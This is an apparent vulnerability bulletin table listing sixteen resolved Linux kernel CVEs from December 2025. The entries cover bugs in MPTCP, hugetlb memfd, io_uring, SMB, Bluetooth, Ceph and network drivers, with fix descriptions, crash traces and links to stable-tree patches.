| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: Initialise rcv_mss before calling tcp_send_active_reset() in mptcp_do_fastclose(). syzbot reported divide-by-zero in __tcp_select_window() by MPTCP socket. [0] We had a similar issue for the bare TCP and fixed in commit 499350a5a6e7 ("tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0"). Let's apply the same fix to mptcp_do_fastclose(). [0]: Oops: divide error: 0000 [#1] SMP KASAN PTI CPU: 0 UID: 0 PID: 6068 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 RIP: 0010:__tcp_select_window+0x824/0x1320 net/ipv4/tcp_output.c:3336 Code: ff ff ff 44 89 f1 d3 e0 89 c1 f7 d1 41 01 cc 41 21 c4 e9 a9 00 00 00 e8 ca 49 01 f8 e9 9c 00 00 00 e8 c0 49 01 f8 44 89 e0 99 <f7> 7c 24 1c 41 29 d4 48 bb 00 00 00 00 00 fc ff df e9 80 00 00 00 RSP: 0018:ffffc90003017640 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88807b469e40 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffc90003017730 R08: ffff888033268143 R09: 1ffff1100664d028 R10: dffffc0000000000 R11: ffffed100664d029 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 000055557faa0500(0000) GS:ffff888126135000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f64a1912ff8 CR3: 0000000072122000 CR4: 00000000003526f0 Call Trace: <TASK> tcp_select_window net/ipv4/tcp_output.c:281 [inline] __tcp_transmit_skb+0xbc7/0x3aa0 net/ipv4/tcp_output.c:1568 tcp_transmit_skb net/ipv4/tcp_output.c:1649 [inline] tcp_send_active_reset+0x2d1/0x5b0 net/ipv4/tcp_output.c:3836 mptcp_do_fastclose+0x27e/0x380 net/mptcp/protocol.c:2793 mptcp_disconnect+0x238/0x710 net/mptcp/protocol.c:3253 mptcp_sendmsg_fastopen+0x2f8/0x580 net/mptcp/protocol.c:1776 mptcp_sendmsg+0x1774/0x1980 net/mptcp/protocol.c:1855 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0xe5/0x270 net/socket.c:742 __sys_sendto+0x3bd/0x520 net/socket.c:2244 __do_sys_sendto net/socket.c:2251 [inline] __se_sys_sendto net/socket.c:2247 [inline] __x64_sys_sendto+0xde/0x100 net/socket.c:2247 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f66e998f749 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffff9acedb8 EFLAGS: 00000246 ORIG_RAX: 000000000000002c RAX: ffffffffffffffda RBX: 00007f66e9be5fa0 RCX: 00007f66e998f749 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003 RBP: 00007ffff9acee10 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000001 R13: 00007f66e9be5fa0 R14: 00007f66e9be5fa0 R15: 0000000000000006 </TASK> | 2025-12-16 | not yet calculated | CVE-2025-68291 | https://git.kernel.org/stable/c/05f5e26d488cdc7abc2a826cf1071782d5a21203 https://git.kernel.org/stable/c/88163f85d59b4164884df900ee171720fd26686b https://git.kernel.org/stable/c/f07f4ea53e22429c84b20832fa098b5ecc0d4e35 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/memfd: fix information leak in hugetlb folios When allocating hugetlb folios for memfd, three initialization steps are missing: 1. Folios are not zeroed, leading to kernel memory disclosure to userspace 2. Folios are not marked uptodate before adding to page cache 3. hugetlb_fault_mutex is not taken before hugetlb_add_to_page_cache() The memfd allocation path bypasses the normal page fault handler (hugetlb_no_page) which would handle all of these initialization steps. This is problematic especially for udmabuf use cases where folios are pinned and directly accessed by userspace via DMA. Fix by matching the initialization pattern used in hugetlb_no_page(): - Zero the folio using folio_zero_user() which is optimized for huge pages - Mark it uptodate with folio_mark_uptodate() - Take hugetlb_fault_mutex before adding to page cache to prevent races The folio_zero_user() change also fixes a potential security issue where uninitialized kernel memory could be disclosed to userspace through read() or mmap() operations on the memfd. | 2025-12-16 | not yet calculated | CVE-2025-68292 | https://git.kernel.org/stable/c/50b4c1c28733a536d637d2f0401d60bcfef60ef2 https://git.kernel.org/stable/c/b09d7c4dc642849d9a96753233c6d00364017fd6 https://git.kernel.org/stable/c/de8798965fd0d9a6c47fc2ac57767ec32de12b49 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/huge_memory: fix NULL pointer dereference when splitting folio Commit c010d47f107f ("mm: thp: split huge page to any lower order pages") introduced an early check on the folio's order via mapping->flags before proceeding with the split work. This check introduced a bug: for shmem folios in the swap cache and truncated folios, the mapping pointer can be NULL. Accessing mapping->flags in this state leads directly to a NULL pointer dereference. This commit fixes the issue by moving the check for mapping != NULL before any attempt to access mapping->flags. | 2025-12-16 | not yet calculated | CVE-2025-68293 | https://git.kernel.org/stable/c/592db83615a9f0164472ec789c2ed34ad35f732f https://git.kernel.org/stable/c/d1b83fbacd4397a1d2f8c6b13427a8636ae2b307 https://git.kernel.org/stable/c/cff47b9e39a6abf03dde5f4f156f841b0c54bba0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/net: ensure vectored buffer node import is tied to notification When support for vectored registered buffers was added, the import itself is using 'req' rather than the notification io_kiocb, sr->notif. For non-vectored imports, sr->notif is correctly used. This is important as the lifetime of the two may be different. Use the correct io_kiocb for the vectored buffer import. | 2025-12-16 | not yet calculated | CVE-2025-68294 | https://git.kernel.org/stable/c/14459281e027f23b70885c1cc1032a71c0efd8d7 https://git.kernel.org/stable/c/f6041803a831266a2a5a5b5af66f7de0845bcbf3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix memory leak in cifs_construct_tcon() When having a multiuser mount with domain= specified and using cifscreds, cifs_set_cifscreds() will end up setting @ctx->domainname, so it needs to be freed before leaving cifs_construct_tcon(). This fixes the following memory leak reported by kmemleak: mount.cifs //srv/share /mnt -o domain=ZELDA,multiuser,... su - testuser cifscreds add -d ZELDA -u testuser ... ls /mnt/1 ... umount /mnt echo scan > /sys/kernel/debug/kmemleak cat /sys/kernel/debug/kmemleak unreferenced object 0xffff8881203c3f08 (size 8): comm "ls", pid 5060, jiffies 4307222943 hex dump (first 8 bytes): 5a 45 4c 44 41 00 cc cc ZELDA... backtrace (crc d109a8cf): __kmalloc_node_track_caller_noprof+0x572/0x710 kstrdup+0x3a/0x70 cifs_sb_tlink+0x1209/0x1770 [cifs] cifs_get_fattr+0xe1/0xf50 [cifs] cifs_get_inode_info+0xb5/0x240 [cifs] cifs_revalidate_dentry_attr+0x2d1/0x470 [cifs] cifs_getattr+0x28e/0x450 [cifs] vfs_getattr_nosec+0x126/0x180 vfs_statx+0xf6/0x220 do_statx+0xab/0x110 __x64_sys_statx+0xd5/0x130 do_syscall_64+0xbb/0x380 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2025-12-16 | not yet calculated | CVE-2025-68295 | https://git.kernel.org/stable/c/ff8f9bd1c46ee02d5558293915d42e82646d5ee9 https://git.kernel.org/stable/c/d146e96fef876492979658dce644305de35878d4 https://git.kernel.org/stable/c/3dd546e867e94c2f954bca45a961b6104ba708b6 https://git.kernel.org/stable/c/f62ffdfb431bdfa4b6d24233b7fd830eca0b801e https://git.kernel.org/stable/c/f15288c137d960836277d0e3ecc62de68e52f00f https://git.kernel.org/stable/c/a67e91d5f446e455dd9201cdd6e865f7078d251d https://git.kernel.org/stable/c/3184b6a5a24ec9ee74087b2a550476f386df7dc2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup Protect vga_switcheroo_client_fb_set() with console lock. Avoids OOB access in fbcon_remap_all(). Without holding the console lock the call races with switching outputs. VGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon function uses struct fb_info.node, which is set by register_framebuffer(). As the fb-helper code currently sets up VGA switcheroo before registering the framebuffer, the value of node is -1 and therefore not a legal value. For example, fbcon uses the value within set_con2fb_map() [1] as an index into an array. Moving vga_switcheroo_client_fb_set() after register_framebuffer() can result in VGA switching that does not switch fbcon correctly. Therefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(), which already holds the console lock. Fbdev calls fbcon_fb_registered() from within register_framebuffer(). Serializes the helper with VGA switcheroo's call to fbcon_remap_all(). Although vga_switcheroo_client_fb_set() takes an instance of struct fb_info as parameter, it really only needs the contained fbcon state. Moving the call to fbcon initialization is therefore cleaner than before. Only amdgpu, i915, nouveau and radeon support vga_switcheroo. For all other drivers, this change does nothing. | 2025-12-16 | not yet calculated | CVE-2025-68296 | https://git.kernel.org/stable/c/482330f8261b4bea8146d9bd69c1199e5dfcbb5c https://git.kernel.org/stable/c/05814c389b53d2f3a0b9eeb90ba7a05ba77c4c2a https://git.kernel.org/stable/c/eb76d0f5553575599561010f24c277cc5b31d003 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix crash in process_v2_sparse_read() for encrypted directories The crash in process_v2_sparse_read() for fscrypt-encrypted directories has been reported. Issue takes place for Ceph msgr2 protocol in secure mode. It can be reproduced by the steps: sudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure (1) mkdir /mnt/cephfs/fscrypt-test-3 (2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3 (3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3 (4) fscrypt lock /mnt/cephfs/fscrypt-test-3 (5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3 (6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar (7) Issue has been triggered [ 408.072247] ------------[ cut here ]------------ [ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865 ceph_con_v2_try_read+0x4b39/0x72f0 [ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common intel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery pmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass polyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse serio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg pata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore [ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+ [ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-5.fc42 04/01/2014 [ 408.072310] Workqueue: ceph-msgr ceph_con_workfn [ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0 [ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8 8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff <0f> 0b e9 06 fe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85 [ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246 [ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38 [ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8 [ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8 [ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000 [ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000) knlGS:0000000000000000 [ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0 [ 408.072336] PKRU: 55555554 [ 408.072337] Call Trace: [ 408.072338] <TASK> [ 408.072340] ? sched_clock_noinstr+0x9/0x10 [ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10 [ 408.072347] ? _raw_spin_unlock+0xe/0x40 [ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830 [ 408.072353] ? __kasan_check_write+0x14/0x30 [ 408.072357] ? mutex_lock+0x84/0xe0 [ 408.072359] ? __pfx_mutex_lock+0x10/0x10 [ 408.072361] ceph_con_workfn+0x27e/0x10e0 [ 408.072364] ? metric_delayed_work+0x311/0x2c50 [ 408.072367] process_one_work+0x611/0xe20 [ 408.072371] ? __kasan_check_write+0x14/0x30 [ 408.072373] worker_thread+0x7e3/0x1580 [ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10 [ 408.072378] ? __pfx_worker_thread+0x10/0x10 [ 408.072381] kthread+0x381/0x7a0 [ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10 [ 408.072385] ? __pfx_kthread+0x10/0x10 [ 408.072387] ? __kasan_check_write+0x14/0x30 [ 408.072389] ? recalc_sigpending+0x160/0x220 [ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50 [ 408.072394] ? calculate_sigpending+0x78/0xb0 [ 408.072395] ? __pfx_kthread+0x10/0x10 [ 408.072397] ret_from_fork+0x2b6/0x380 [ 408.072400] ? __pfx_kthread+0x10/0x10 [ 408.072402] ret_from_fork_asm+0x1a/0x30 [ 408.072406] </TASK> [ 408.072407] ---[ end trace 0000000000000000 ]--- [ 408.072418] Oops: general protection fault, probably for non-canonical address 0xdffffc00000000 ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68297 | https://git.kernel.org/stable/c/5a3f3e39b18705bc578fae58abacc8ef93c15194 https://git.kernel.org/stable/c/47144748fbf12068ba4b82512098fe1ac748a2e9 https://git.kernel.org/stable/c/7d1b7de853f7d1eefd6d22949bcefc0c25186727 https://git.kernel.org/stable/c/43962db4a6f593903340c85591056a0cef812dfd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: mediatek: Avoid btusb_mtk_claim_iso_intf() NULL deref In btusb_mtk_setup(), we set `btmtk_data->isopkt_intf` to: usb_ifnum_to_if(data->udev, MTK_ISO_IFNUM) That function can return NULL in some cases. Even when it returns NULL, though, we still go on to call btusb_mtk_claim_iso_intf(). As of commit e9087e828827 ("Bluetooth: btusb: mediatek: Add locks for usb_driver_claim_interface()"), calling btusb_mtk_claim_iso_intf() when `btmtk_data->isopkt_intf` is NULL will cause a crash because we'll end up passing a bad pointer to device_lock(). Prior to that commit we'd pass the NULL pointer directly to usb_driver_claim_interface() which would detect it and return an error, which was handled. Resolve the crash in btusb_mtk_claim_iso_intf() by adding a NULL check at the start of the function. This makes the code handle a NULL `btmtk_data->isopkt_intf` the same way it did before the problematic commit (just with a slight change to the error message printed). | 2025-12-16 | not yet calculated | CVE-2025-68298 | https://git.kernel.org/stable/c/2fa09fe98ca3b114d66285f65f7e108fea131815 https://git.kernel.org/stable/c/c3b990e0b23068da65f0004cd38ee31f43f36460 https://git.kernel.org/stable/c/c884a0b27b4586e607431d86a1aa0bb4fb39169c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: afs: Fix delayed allocation of a cell's anonymous key The allocation of a cell's anonymous key is done in a background thread along with other cell setup such as doing a DNS upcall. In the reported bug, this is triggered by afs_parse_source() parsing the device name given to mount() and calling afs_lookup_cell() with the name of the cell. The normal key lookup then tries to use the key description on the anonymous authentication key as the reference for request_key() - but it may not yet be set and so an oops can happen. This has been made more likely to happen by the fix for dynamic lookup failure. Fix this by firstly allocating a reference name and attaching it to the afs_cell record when the record is created. It can share the memory allocation with the cell name (unfortunately it can't just overlap the cell name by prepending it with "afs@" as the cell name already has a '.' prepended for other purposes). This reference name is then passed to request_key(). Secondly, the anon key is now allocated on demand at the point a key is requested in afs_request_key() if it is not already allocated. A mutex is used to prevent multiple allocation for a cell. Thirdly, make afs_request_key_rcu() return NULL if the anonymous key isn't yet allocated (if we need it) and then the caller can return -ECHILD to drop out of RCU-mode and afs_request_key() can be called. Note that the anonymous key is kind of necessary to make the key lookup cache work as that doesn't currently cache a negative lookup, but it's probably worth some investigation to see if NULL can be used instead. | 2025-12-16 | not yet calculated | CVE-2025-68299 | https://git.kernel.org/stable/c/5613bde937dfac6725e9c3fc766b9d6b8481e55b https://git.kernel.org/stable/c/d27c71257825dced46104eefe42e4d9964bd032e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/namespace: fix reference leak in grab_requested_mnt_ns lookup_mnt_ns() already takes a reference on mnt_ns. grab_requested_mnt_ns() doesn't need to take an extra reference. | 2025-12-16 | not yet calculated | CVE-2025-68300 | https://git.kernel.org/stable/c/4a16b2a0c1f033f95f5d0b98b9e40e8bf7c4c2c5 https://git.kernel.org/stable/c/fe256e59b8e7f126b2464ee32bd9fee131f0a883 https://git.kernel.org/stable/c/7b6dcd9bfd869eee7693e45b1817dac8c56e5f86 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: atlantic: fix fragment overflow handling in RX path The atlantic driver can receive packets with more than MAX_SKB_FRAGS (17) fragments when handling large multi-descriptor packets. This causes an out-of-bounds write in skb_add_rx_frag_netmem() leading to kernel panic. The issue occurs because the driver doesn't check the total number of fragments before calling skb_add_rx_frag(). When a packet requires more than MAX_SKB_FRAGS fragments, the fragment index exceeds the array bounds. Fix by assuming there will be an extra frag if buff->len > AQ_CFG_RX_HDR_SIZE, then all fragments are accounted for. And reusing the existing check to prevent the overflow earlier in the code path. This crash occurred in production with an Aquantia AQC113 10G NIC. Stack trace from production environment: ``` RIP: 0010:skb_add_rx_frag_netmem+0x29/0xd0 Code: 90 f3 0f 1e fa 0f 1f 44 00 00 48 89 f8 41 89 ca 48 89 d7 48 63 ce 8b 90 c0 00 00 00 48 c1 e1 04 48 01 ca 48 03 90 c8 00 00 00 <48> 89 7a 30 44 89 52 3c 44 89 42 38 40 f6 c7 01 75 74 48 89 fa 83 RSP: 0018:ffffa9bec02a8d50 EFLAGS: 00010287 RAX: ffff925b22e80a00 RBX: ffff925ad38d2700 RCX: fffffffe0a0c8000 RDX: ffff9258ea95bac0 RSI: ffff925ae0a0c800 RDI: 0000000000037a40 RBP: 0000000000000024 R08: 0000000000000000 R09: 0000000000000021 R10: 0000000000000848 R11: 0000000000000000 R12: ffffa9bec02a8e24 R13: ffff925ad8615570 R14: 0000000000000000 R15: ffff925b22e80a00 FS: 0000000000000000(0000) GS:ffff925e47880000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff9258ea95baf0 CR3: 0000000166022004 CR4: 0000000000f72ef0 PKRU: 55555554 Call Trace: <IRQ> aq_ring_rx_clean+0x175/0xe60 [atlantic] ? aq_ring_rx_clean+0x14d/0xe60 [atlantic] ? aq_ring_tx_clean+0xdf/0x190 [atlantic] ? kmem_cache_free+0x348/0x450 ? aq_vec_poll+0x81/0x1d0 [atlantic] ? __napi_poll+0x28/0x1c0 ? net_rx_action+0x337/0x420 ``` Changes in v4: - Add Fixes: tag to satisfy patch validation requirements. Changes in v3: - Fix by assuming there will be an extra frag if buff->len > AQ_CFG_RX_HDR_SIZE, then all fragments are accounted for. | 2025-12-16 | not yet calculated | CVE-2025-68301 | https://git.kernel.org/stable/c/34147477eeab24077fcfe9649e282849347d760c https://git.kernel.org/stable/c/b0c4d5135b04ea100988e2458c98f2d8564cda16 https://git.kernel.org/stable/c/5d6051ea1b0417ae2f06a8440d22e48fbc8f8997 https://git.kernel.org/stable/c/3be37c3c96b16462394fcb8e15e757c691377038 https://git.kernel.org/stable/c/3fd2105e1b7e041cc24be151c9a31a14d5fc50ab https://git.kernel.org/stable/c/64e47cd1fd631a21bf5a630cebefec6c8fc381cd https://git.kernel.org/stable/c/5ffcb7b890f61541201461580bb6622ace405aec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: sxgbe: fix potential NULL dereference in sxgbe_rx() Currently, when skb is null, the driver prints an error and then dereferences skb on the next line. To fix this, let's add a 'break' after the error message to switch to sxgbe_rx_refill(), which is similar to the approach taken by the other drivers in this particular case, e.g. calxeda with xgmac_rx(). Found during a code review. | 2025-12-16 | not yet calculated | CVE-2025-68302 | https://git.kernel.org/stable/c/ac171c3c755499c9f87fe30b920602255f8b5648 https://git.kernel.org/stable/c/18ef3ad1bb57dcf1a9ee61736039aedccf670b21 https://git.kernel.org/stable/c/46e5332126596a2ca791140feab18ce1fc1a3c86 https://git.kernel.org/stable/c/7fd789d6ea4915034eb6bcb72f6883c8151083e5 https://git.kernel.org/stable/c/45b5b4ddb8d6bea5fc1625ff6f163bbb125d49cc https://git.kernel.org/stable/c/88f46c0be77bfe45830ac33102c75be7c34ac3f3 https://git.kernel.org/stable/c/f5bce28f6b9125502abec4a67d68eabcd24b3b17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: intel: punit_ipc: fix memory corruption This passes the address of the pointer "&punit_ipcdev" when the intent was to pass the pointer itself "punit_ipcdev" (without the ampersand). This means that the: complete(&ipcdev->cmd_complete); in intel_punit_ioc() will write to a wrong memory address corrupting it. | 2025-12-16 | not yet calculated | CVE-2025-68303 | https://git.kernel.org/stable/c/15d560cdf5b36c51fffec07ac2a983ab3bff4cb2 https://git.kernel.org/stable/c/46e9d6f54184573dae1dcbcf6685a572ba6f4480 https://git.kernel.org/stable/c/3e7442c5802146fd418ba3f68dcb9ca92b5cec83 https://git.kernel.org/stable/c/a21615a4ac6fecbb586d59fe2206b63501021789 https://git.kernel.org/stable/c/c2ee6d38996775a19bfdf20cb01a9b8698cb0baa https://git.kernel.org/stable/c/9b9c0adbc3f8a524d291baccc9d0c04097fb4869 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_core: lookup hci_conn on RX path on protocol side The hdev lock/lookup/unlock/use pattern in the packet RX path doesn't ensure hci_conn* is not concurrently modified/deleted. This locking appears to be leftover from before conn_hash started using RCU commit bf4c63252490b ("Bluetooth: convert conn hash to RCU") and not clear if it had purpose since then. Currently, there are code paths that delete hci_conn* from elsewhere than the ordered hdev->workqueue where the RX work runs in. E.g. commit 5af1f84ed13a ("Bluetooth: hci_sync: Fix UAF on hci_abort_conn_sync") introduced some of these, and there probably were a few others before it. It's better to do the locking so that even if these run concurrently no UAF is possible. Move the lookup of hci_conn and associated socket-specific conn to protocol recv handlers, and do them within a single critical section to cover hci_conn* usage and lookup. syzkaller has reported a crash that appears to be this issue: [Task hdev->workqueue] [Task 2] hci_disconnect_all_sync l2cap_recv_acldata(hcon) hci_conn_get(hcon) hci_abort_conn_sync(hcon) hci_dev_lock hci_dev_lock hci_conn_del(hcon) v-------------------------------- hci_dev_unlock hci_conn_put(hcon) conn = hcon->l2cap_data (UAF) | 2025-12-16 | not yet calculated | CVE-2025-68304 | https://git.kernel.org/stable/c/ec74cdf77310c43b01b83ee898a9bd4b4b0b8e93 https://git.kernel.org/stable/c/79a2d4678ba90bdba577dc3af88cc900d6dcd5ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sock: Prevent race in socket write iter and sock bind There is a potential race condition between sock bind and socket write iter. bind may free the same cmd via mgmt_pending before write iter sends the cmd, just as syzbot reported in UAF[1]. Here we use hci_dev_lock to synchronize the two, thereby avoiding the UAF mentioned in [1]. [1] syzbot reported: BUG: KASAN: slab-use-after-free in mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316 Read of size 8 at addr ffff888077164818 by task syz.0.17/5989 Call Trace: mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316 set_link_security+0x5c2/0x710 net/bluetooth/mgmt.c:1918 hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719 hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:742 sock_write_iter+0x279/0x360 net/socket.c:1195 Allocated by task 5989: mgmt_pending_add+0x35/0x140 net/bluetooth/mgmt_util.c:296 set_link_security+0x557/0x710 net/bluetooth/mgmt.c:1910 hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719 hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:742 sock_write_iter+0x279/0x360 net/socket.c:1195 Freed by task 5991: mgmt_pending_free net/bluetooth/mgmt_util.c:311 [inline] mgmt_pending_foreach+0x30d/0x380 net/bluetooth/mgmt_util.c:257 mgmt_index_removed+0x112/0x2f0 net/bluetooth/mgmt.c:9477 hci_sock_bind+0xbe9/0x1000 net/bluetooth/hci_sock.c:1314 | 2025-12-16 | not yet calculated | CVE-2025-68305 | https://git.kernel.org/stable/c/fe68510fc99bb4b88c9c611f83699749002d515a https://git.kernel.org/stable/c/e90c05fc5bbea956450a05cc3b36b8fa29cf195e https://git.kernel.org/stable/c/69fcb0344bc0dd5b13d7e4e98f8b6bf25a6d4ff7 https://git.kernel.org/stable/c/89bb613511cc21ed5ba6bddc1c9b9ae9c0dad392 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: mediatek: Fix kernel crash when releasing mtk iso interface When performing reset tests and encountering abnormal card drop issues that lead to a kernel crash, it is necessary to perform a null check before releasing resources to avoid attempting to release a null pointer. <4>[ 29.158070] Hardware name: Google Quigon sku196612/196613 board (DT) <4>[ 29.158076] Workqueue: hci0 hci_cmd_sync_work [bluetooth] <4>[ 29.158154] pstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) <4>[ 29.158162] pc : klist_remove+0x90/0x158 <4>[ 29.158174] lr : klist_remove+0x88/0x158 <4>[ 29.158180] sp : ffffffc0846b3c00 <4>[ 29.158185] pmr_save: 000000e0 <4>[ 29.158188] x29: ffffffc0846b3c30 x28: ffffff80cd31f880 x27: ffffff80c1bdc058 <4>[ 29.158199] x26: dead000000000100 x25: ffffffdbdc624ea3 x24: ffffff80c1bdc4c0 <4>[ 29.158209] x23: ffffffdbdc62a3e6 x22: ffffff80c6c07000 x21: ffffffdbdc829290 <4>[ 29.158219] x20: 0000000000000000 x19: ffffff80cd3e0648 x18: 000000031ec97781 <4>[ 29.158229] x17: ffffff80c1bdc4a8 x16: ffffffdc10576548 x15: ffffff80c1180428 <4>[ 29.158238] x14: 0000000000000000 x13: 000000000000e380 x12: 0000000000000018 <4>[ 29.158248] x11: ffffff80c2a7fd10 x10: 0000000000000000 x9 : 0000000100000000 <4>[ 29.158257] x8 : 0000000000000000 x7 : 7f7f7f7f7f7f7f7f x6 : 2d7223ff6364626d <4>[ 29.158266] x5 : 0000008000000000 x4 : 0000000000000020 x3 : 2e7325006465636e <4>[ 29.158275] x2 : ffffffdc11afeff8 x1 : 0000000000000000 x0 : ffffffdc11be4d0c <4>[ 29.158285] Call trace: <4>[ 29.158290] klist_remove+0x90/0x158 <4>[ 29.158298] device_release_driver_internal+0x20c/0x268 <4>[ 29.158308] device_release_driver+0x1c/0x30 <4>[ 29.158316] usb_driver_release_interface+0x70/0x88 <4>[ 29.158325] btusb_mtk_release_iso_intf+0x68/0xd8 [btusb (HASH:e8b6 5)] <4>[ 29.158347] btusb_mtk_reset+0x5c/0x480 [btusb (HASH:e8b6 5)] <4>[ 29.158361] hci_cmd_sync_work+0x10c/0x188 [bluetooth (HASH:a4fa 6)] <4>[ 29.158430] process_scheduled_works+0x258/0x4e8 <4>[ 29.158441] worker_thread+0x300/0x428 <4>[ 29.158448] kthread+0x108/0x1d0 <4>[ 29.158455] ret_from_fork+0x10/0x20 <0>[ 29.158467] Code: 91343000 940139d1 f9400268 927ff914 (f9401297) <4>[ 29.158474] ---[ end trace 0000000000000000 ]--- <0>[ 29.167129] Kernel panic - not syncing: Oops: Fatal exception <2>[ 29.167144] SMP: stopping secondary CPUs <4>[ 29.167158] ------------[ cut here ]------------ | 2025-12-16 | not yet calculated | CVE-2025-68306 | https://git.kernel.org/stable/c/421e88a0d85782786b7a1764c75518b4845e07b3 https://git.kernel.org/stable/c/faae9f2ea8806f2499186448adbf94689b47b82b https://git.kernel.org/stable/c/4015b979767125cf8a2233a145a3b3af78bfd8fb |
